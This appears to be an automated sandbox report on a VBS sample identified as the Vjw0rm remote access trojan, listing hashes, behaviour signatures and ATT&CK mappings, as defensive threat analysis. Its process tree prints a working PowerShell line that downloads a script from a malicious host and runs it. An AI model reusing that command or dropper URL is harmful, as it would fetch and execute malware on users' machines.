Overview

overview

10

Static

static

NS882992019101.vbs

windows7_x64

10

NS882992019101.vbs

windows10_x64

10

Analysis

  • max time kernel
    147s
  • max time network
    156s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-08-2021 22:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NS882992019101.vbs

  • Size

    13KB

  • MD5

    1abbd5432118e4de7c696d5d43a7449f

  • SHA1

    49fea89d7fc9f8be3afa2fd1b0ae9b6075c0acbf

  • SHA256

    b4489a7f0467bee2782b5e5cf74763d0c05148a9044092eb79aba7c588f35f99

  • SHA512

    7012990308d3b7e451c65b1bc1e26693a04e1bd63f3c3d735538fbb4e9092d87b3ed323a45231004fcbd3795c11803477d8c1645cf1d2b9c0fc915150161b31f

Score
10/10
vjw0rmtrojanworm

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://7501.nerdpol.ovh/7501/fr.txt

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

    trojanwormvjw0rm
  • Blocklisted process makes network request 2 IoCs
  • Drops startup file 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NS882992019101.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient]$WEB=New-Object System.Net.WebClient;$WEB.DownloadFile('http://7501.nerdpol.ovh/7501/fr.txt','C:\Users\Public\fr.PS1');PowerShell -File C:\Users\Public\fr.PS1
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3556
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File C:\Users\Public\fr.PS1
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2396

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\fr.PS1
    MD5

    5480fceef4e5290938cb0a23955358df

    SHA1

    891c237730a39b36bd443e485d3493f5f7ff68c5

    SHA256

    d9cfdea62d4a3acc5ec47cfc0349002af129add61611a0810b73394bc7ea3020

    SHA512

    3cf3bef1f0d02ba68d5656e842a58b001aa4ba7b67ab1e21d93b8f2efa604283c58224bd8f8a208b09ab14e1443f78e4da7dbbbd1f1edfaa60316ae1056be392

    Download Submit
  • memory/2396-129-0x0000000000000000-mapping.dmp
    Download
  • memory/2396-140-0x0000023E344D3000-0x0000023E344D5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2396-139-0x0000023E344D0000-0x0000023E344D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2396-178-0x0000023E344D6000-0x0000023E344D8000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3556-114-0x0000000000000000-mapping.dmp
    Download
  • memory/3556-119-0x000002AE72930000-0x000002AE72931000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3556-122-0x000002AE72AE0000-0x000002AE72AE1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3556-123-0x000002AE727F0000-0x000002AE727F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3556-126-0x000002AE727F3000-0x000002AE727F5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3556-138-0x000002AE727F6000-0x000002AE727F8000-memory.dmp
    Filesize

    8KB

    Download